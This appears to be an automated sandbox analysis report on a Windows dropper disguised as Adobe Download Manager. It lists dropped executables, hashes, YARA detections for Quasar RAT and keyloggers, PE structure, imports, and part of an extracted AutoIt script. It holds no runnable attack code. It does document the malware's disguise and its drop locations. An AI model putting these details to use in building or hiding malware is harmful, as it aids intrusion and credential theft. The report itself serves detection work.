Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 84%, Browse Antivirus: ReversingLabs, Detection: 93%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o`..+..,+..,+..,"y ,#..,+..,i..,...,(..,...,..,...,(..,._.-..,._.-"..,._.-*..,Rich+..,........................PE..L...U..\.................6.......... ........P....@.......................................@..................................T..x............................p..p...`S...............................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...@....`.......D..............@....reloc..p....p.......R..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\windef.exe Download File
Process:	C:\Users\user\btpanui\SystemPropertiesPerformance.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:8K2J10qdSlEc39HGx5yVmnKKJfotFCuHi/b25s/Wz0J:8KF6y0KKlotF3iKO/Wz0J
MD5:	B4A202E03D4135484D0E730173ABCC72
SHA1:	01B30014545EA526C15A60931D676F9392EA0C70
SHA-256:	7050608D53F80269DF951D00883ED79815C060CE7678A76B5C3F6A2A985BEEA9
SHA-512:	632A035A3B722EA29B02AAD1F0DA3DF5BDC38ABC7E6617223790955C6C0830F1070B528680416D5C63EA5E846074CDAD87F06C21C35A77B1CCC4EDC089D8B1FB
Malicious:	true
Yara Hits:	Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 86%, Browse Antivirus: ReversingLabs, Detection: 93%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......\.................h............... ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....g... ...h.................. ..`.rsrc................j..............@..@.reloc...............r..............@..B........................H.......(...H...............H.............................................{...."..}.........{...."..}.......n.(......(.......(....(......(.......(....(.......(....(.......0...........t......-...(.....o....o.......0..L..................(....-8......(....-$.....(....o.............o.....(....&.(....&..0...............o......0...................(....o............o.....t.....r...p..r...p..~....o........,...(.....t........,...o...../.s....z......&r...p.......,..(....&....

C:\Users\user\AppData\Roaming\SubDir\winsock.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\windef.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	357376
Entropy (8bit):	6.424314821503838
Encrypted:	false
SSDEEP:	6144:8K2J10qdSlEc39HGx5yVmnKKJfotFCuHi/b25s/Wz0J:8KF6y0KKlotF3iKO/Wz0J
MD5:	B4A202E03D4135484D0E730173ABCC72
SHA1:	01B30014545EA526C15A60931D676F9392EA0C70
SHA-256:	7050608D53F80269DF951D00883ED79815C060CE7678A76B5C3F6A2A985BEEA9
SHA-512:	632A035A3B722EA29B02AAD1F0DA3DF5BDC38ABC7E6617223790955C6C0830F1070B528680416D5C63EA5E846074CDAD87F06C21C35A77B1CCC4EDC089D8B1FB
Malicious:	true
Yara Hits:	Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 93%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......\.................h............... ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....g... ...h.................. ..`.rsrc................j..............@..@.reloc...............r..............@..B........................H.......(...H...............H.............................................{...."..}.........{...."..}.......n.(......(.......(....(......(.......(....(.......(....(.......0...........t......-...(.....o....o.......0..L..................(....-8......(....-$.....(....o.............o.....(....&.(....&..0...............o......0...................(....o............o.....t.....r...p..r...p..~....o........,...(.....t........,...o...../.s....z......&r...p.......,..(....&....

C:\Users\user\btpanui\SystemPropertiesPerformance.exe Download File
Process:	C:\Users\user\Desktop\CVbJSUXraQ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2111272
Entropy (8bit):	6.7152149759316115
Encrypted:	false
SSDEEP:	24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYc:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YC
MD5:	9423821A023FB02427783F6385871B3B
SHA1:	1F75D4DC2E3665B6025DCEF7E0D9A51D96C608A4
SHA-256:	CEFA469207046F1BA256D52D6685B40376A06159926AB3D20925FB413B487098
SHA-512:	52D3791DDA128D28B1CF803E2A4B8F355B223587550A02A178F5D7FB339B196CABE847AB49EBE2E70CDFDEA41FBF62752E71E1920182BBCA7C5BA5B9F3CFF2BB
Malicious:	true
Yara Hits:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...d..\.........."..........N.......}............@........................... ...........@...@.......@.....................L...\|....p...............0 ...... ..q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q... ..r..................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.715211023726544
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.72% Win32 Executable (generic) a (10002005/4) 49.68% Windows ActiveX control (116523/4) 0.58% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	CVbJSUXraQ.exe
File size:	2111264
MD5:	b0b78da613422be0de8de2e2a2d0ce68
SHA1:	a1aea30e16b3bbf15baf1fbb78499adcc5e11d97
SHA256:	efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0
SHA512:	6448d7a633aceae8c20fd077e5d4a83f5a542f4b229f0299440bd1b9d90772c83e5a9ca831fed1cf34e75fe08ade8cd386d651d50d1dfee1e102df496252ea57
SSDEEP:	24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYQ:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	c4c4c4c8ccd4d0c4

Static PE Info

General
Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp:	0x5C87B664 [Tue Mar 12 13:38:44 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F9848DC6C7Ah
jmp 00007F9848DB9A44h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F9848DB9BCAh
cmp edi, eax
jc 00007F9848DB9F2Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F9848DB9BC9h
rep movsb
jmp 00007F9848DB9EDCh
cmp ecx, 00000080h
jc 00007F9848DB9D94h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F9848DB9BD0h
bt dword ptr [004BE324h], 01h
jc 00007F9848DBA0A0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F9848DB9D6Dh
test edi, 00000003h
jne 00007F9848DB9D7Eh
test esi, 00000003h
jne 00007F9848DB9D5Dh
bt edi, 02h
jnc 00007F9848DB9BCFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F9848DB9BD3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F9848DB9C25h
bt esi, 03h
jnc 00007F9848DB9C78h

Rich Headers

Programming Language:

[ASM] VS2013 UPD4 build 31101
[ C ] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[LNK] VS2013 UPD4 build 31101
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[RES] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x13a7f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x203000	0x0	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x202000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	False	0.572867910242	data	6.67611805852	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	False	0.335355267615	data	5.76010872795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	False	0.10175304878	data	1.1987458977	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xc7000	0x13a7f8	0x13a800	False	0.481297042677	data	6.62212260461	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x202000	0x711c	0x7200	False	0.765076754386	data	6.77903165045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc77b4	0x468	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc7c1c	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc7d44	0x668	data	English	Great Britain
RT_ICON	0xc83ac	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294965391, next used block 7403512	English	Great Britain
RT_ICON	0xc8694	0x1e8	data	English	Great Britain
RT_ICON	0xc887c	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc89a4	0x35e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain
RT_ICON	0xcbf84	0xea8	data	English	Great Britain
RT_ICON	0xcce2c	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	English	Great Britain
RT_ICON	0xcd6d4	0x6c8	data	English	Great Britain
RT_ICON	0xcdd9c	0x568	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xce304	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	Great Britain
RT_ICON	0xdeb2c	0x94a8	data	English	Great Britain
RT_ICON	0xe7fd4	0x67e8	data	English	Great Britain
RT_ICON	0xee7bc	0x5488	data	English	Great Britain
RT_ICON	0xf3c44	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432	English	Great Britain
RT_ICON	0xf7e6c	0x25a8	data	English	Great Britain
RT_ICON	0xfa414	0x10a8	data	English	Great Britain
RT_STRING	0xfb4bc	0x594	data	English	Great Britain
RT_STRING	0xfba50	0x68a	data	English	Great Britain
RT_STRING	0xfc0dc	0x490	data	English	Great Britain
RT_STRING	0xfc56c	0x5fc	data	English	Great Britain
RT_STRING	0xfcb68	0x65c	data	English	Great Britain
RT_STRING	0xfd1c4	0x466	data	English	Great Britain
RT_STRING	0xfd62c	0x158	data	English	Great Britain
RT_FONT	0xfd784	0x1c211	ASCII text, with very long lines, with no line terminators
RT_FONT	0x119998	0x1c211	ASCII text, with very long lines, with no line terminators
RT_RCDATA	0x135bac	0x65600	PE32 executable (GUI) Intel 80386, for MS Windows
RT_RCDATA	0x19b1ac	0x57400	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
RT_RCDATA	0x1f25ac	0xea26	data
RT_GROUP_ICON	0x200fd4	0x102	data	English	Great Britain
RT_GROUP_ICON	0x2010d8	0x14	data	English	Great Britain
RT_VERSION	0x2010ec	0x31c	data
RT_MANIFEST	0x201408	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
LegalCopyright	Copyright 2018 Adobe Incorporated. All rights reserved.
FileVersion	...
CompanyName	Adobe Systems Incorporated
ProductName	Adobe Download Manager
ProductVersion	...
FileDescription	Adobe Download Manager
OriginalFilename	Adobe Download Manager
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Static AutoIT Info

General

Code:

GLOBAL CONST $OPT_COORDSRELATIVE = 0 GLOBAL CONST $OPT_COORDSABSOLUTE = 1 GLOBAL CONST $OPT_COORDSCLIENT = 2 GLOBAL CONST $OPT_ERRORSILENT = 0 GLOBAL CONST $OPT_ERRORFATAL = 1 GLOBAL CONST $OPT_CAPSNOSTORE = 0 GLOBAL CONST $OPT_CAPSSTORE = 1 GLOBAL CONST $OPT_MATCHSTART = 1 GLOBAL CONST $OPT_MATCHANY = 2 GLOBAL CONST $OPT_MATCHEXACT = 3 GLOBAL CONST $OPT_MATCHADVANCED = 4 GLOBAL CONST $CCS_TOP = 1 GLOBAL CONST $CCS_NOMOVEY = 2 GLOBAL CONST $CCS_BOTTOM = 3 GLOBAL CONST $CCS_NORESIZE = 4 GLOBAL CONST $CCS_NOPARENTALIGN = 8 GLOBAL CONST $CCS_NOHILITE = 16 GLOBAL CONST $CCS_ADJUSTABLE = 32 GLOBAL CONST $CCS_NODIVIDER = 64 GLOBAL CONST $CCS_VERT = 128 GLOBAL CONST $CCS_LEFT = 129 GLOBAL CONST $CCS_NOMOVEX = 130 GLOBAL CONST $CCS_RIGHT = 131 GLOBAL CONST $DT_DRIVETYPE = 1 GLOBAL CONST $DT_SSDSTATUS = 2 GLOBAL CONST $DT_BUSTYPE = 3 GLOBAL CONST $PROXY_IE = 0 GLOBAL CONST $PROXY_NONE = 1 GLOBAL CONST $PROXY_SPECIFIED = 2 GLOBAL CONST $OBJID_WINDOW = 0 GLOBAL CONST $OBJID_TITLEBAR = 4294967294 GLOBAL CONST $OBJID_SIZEGRIP = 4294967289 GLOBAL CONST $OBJID_CARET = 4294967288 GLOBAL CONST $OBJID_CURSOR = 4294967287 GLOBAL CONST $OBJID_ALERT = 4294967286 GLOBAL CONST $OBJID_SOUND = 4294967285 GLOBAL CONST $DLG_CENTERONTOP = 0 GLOBAL CONST $DLG_NOTITLE = 1 GLOBAL CONST $DLG_NOTONTOP = 2 GLOBAL CONST $DLG_TEXTLEFT = 4 GLOBAL CONST $DLG_TEXTRIGHT = 8 GLOBAL CONST $DLG_MOVEABLE = 16 GLOBAL CONST $DLG_TEXTVCENTER = 32 GLOBAL CONST $IDC_UNKNOWN = 0 GLOBAL CONST $IDC_APPSTARTING = 1 GLOBAL CONST $IDC_ARROW = 2 GLOBAL CONST $IDC_CROSS = 3 GLOBAL CONST $IDC_HAND = 32649 GLOBAL CONST 